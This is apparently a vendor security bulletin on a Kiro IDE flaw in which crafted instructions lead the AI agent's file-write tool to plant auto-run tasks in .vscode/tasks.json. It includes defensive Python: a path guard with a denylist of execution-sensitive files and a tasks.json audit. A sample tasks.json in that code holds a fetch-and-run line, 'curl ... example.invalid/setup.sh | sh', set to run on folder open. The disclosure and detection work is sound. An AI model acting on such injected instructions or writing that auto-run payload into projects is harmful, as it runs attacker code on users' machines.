CVE-2026-10591 - Kiro IDE Insufficient File Write Restrictions to Execution-Sensitive Paths
Bulletin ID: 2026-037-AWS
Scope: AWS
Content Type: Important (requires attention)
Publication Date: 06/02/2026 08:45 AM PDT
Description:
Kiro is an agentic IDE that users install on their desktop. We identified CVE-2026-10591: insufficient access control restrictions in the file write tool in Kiro IDE prior to version 0.11 might allow remote unauthenticated actors to execute arbitrary commands via crafted instructions that cause the tool to write to execution-sensitive paths (such as .vscode/tasks.json). Content written to such a path can be configured to run automatically the next time the folder is opened in the IDE, so the attacker needs neither local access nor credentials, only for the agent to act on the crafted instructions.
Impacted versions: <0.11
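As an added example (not Kiro's code and not the fix AWS shipped in 0.11), the Python below shows the two checks a practitioner would want around this class of bug: a path guard that a file-write tool could apply before writing, resolving the target against the workspace root so that `..` segments, absolute paths and existing symlinks cannot dodge a plain string match, and an audit that parses a workspace's .vscode/tasks.json and reports tasks configured with `runOptions.runOn: "folderOpen"`, the VS Code task setting that starts a task automatically when the folder is opened. It goes beyond the single path named in the bulletin: the denylist entries other than .vscode/tasks.json and the sample tasks.json are this example's own assumptions, not paths the bulletin lists or the set Kiro enforces.

```python
import json
import re
from pathlib import Path

# Assumption: an illustrative denylist. The bulletin names only .vscode/tasks.json;
# the other entries are this example's additions, not the set Kiro 0.11 enforces.
EXECUTION_SENSITIVE_FILES = {
    ".vscode/tasks.json",     # tasks with runOptions.runOn == "folderOpen" start on open
    ".vscode/settings.json",  # can redirect interpreters, shells and tool binaries
    ".vscode/launch.json",    # debug configurations launch arbitrary programs
}
EXECUTION_SENSITIVE_DIRS = {
    ".git/hooks",             # scripts run by ordinary git commands
}


def is_execution_sensitive(workspace_root: str, target: str) -> bool:
    """Decide whether a file-write tool should refuse `target`.

    The path is resolved against the workspace root so that `..` segments,
    absolute paths and existing symlinks cannot bypass a naive string match.
    Anything that resolves outside the workspace is refused as well.
    """
    root = Path(workspace_root).resolve()
    resolved = (root / target).resolve()       # an absolute `target` replaces root here
    try:
        rel = resolved.relative_to(root).as_posix()
    except ValueError:
        return True                            # escaped the workspace entirely
    if rel in EXECUTION_SENSITIVE_FILES:
        return True
    return any(rel == d or rel.startswith(d + "/") for d in EXECUTION_SENSITIVE_DIRS)


def _strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments from JSON-with-comments while leaving string
    contents untouched (a bare regex would mangle "http://..." inside a command)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:        # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def folder_open_tasks(tasks_json_text: str) -> list:
    """Return the tasks a VS Code-compatible editor starts automatically when
    the folder is opened, i.e. those with runOptions.runOn == "folderOpen"."""
    text = _strip_jsonc(tasks_json_text)
    text = re.sub(r",(\s*[}\]])", r"\1", text)  # tolerate trailing commas
    data = json.loads(text)
    return [
        t for t in data.get("tasks", [])
        if isinstance(t, dict)
        and (t.get("runOptions") or {}).get("runOn") == "folderOpen"
    ]


def audit_workspace(workspace_root: str) -> list:
    """Report auto-run tasks in an on-disk workspace (empty list if none)."""
    path = Path(workspace_root) / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return folder_open_tasks(path.read_text(encoding="utf-8"))


# Constructed sample tasks.json, modelled on the VS Code schema: one ordinary
# build task and one task that would pipe a remote script to sh on folder open.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample, not taken from any real repository
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "make", },
    {
      "label": "refresh deps",
      "type": "shell",
      "command": "curl -s http://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

if __name__ == "__main__":
    for target in (".vscode/tasks.json", "src/../.vscode/tasks.json", "src/main.py"):
        print(f"{target!r:32} refuse={is_execution_sensitive('/tmp/ws', target)}")
    for task in folder_open_tasks(SAMPLE_TASKS_JSON):
        print(f"auto-run task {task['label']!r}: {task['command']}")
```

The guard treats any write that resolves outside the workspace as sensitive rather than silently allowing it, because a tool that only blocks a list of relative names still lets `../` or an absolute path reach the same files; the audit is what to run over existing workspaces after upgrading, since the upgrade prevents new writes but does not remove a tasks.json an earlier version may already have written.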
Resolution:
This issue has been addressed in Kiro IDE version 0.11. We recommend upgrading to the latest version.
Workarounds:
No workaround available.
References:
Acknowledgement:
We would like to thank Cymulate for collaborating on this issue through the coordinated vulnerability disclosure process.
Please email aws-security@amazon.com with any security questions or concerns.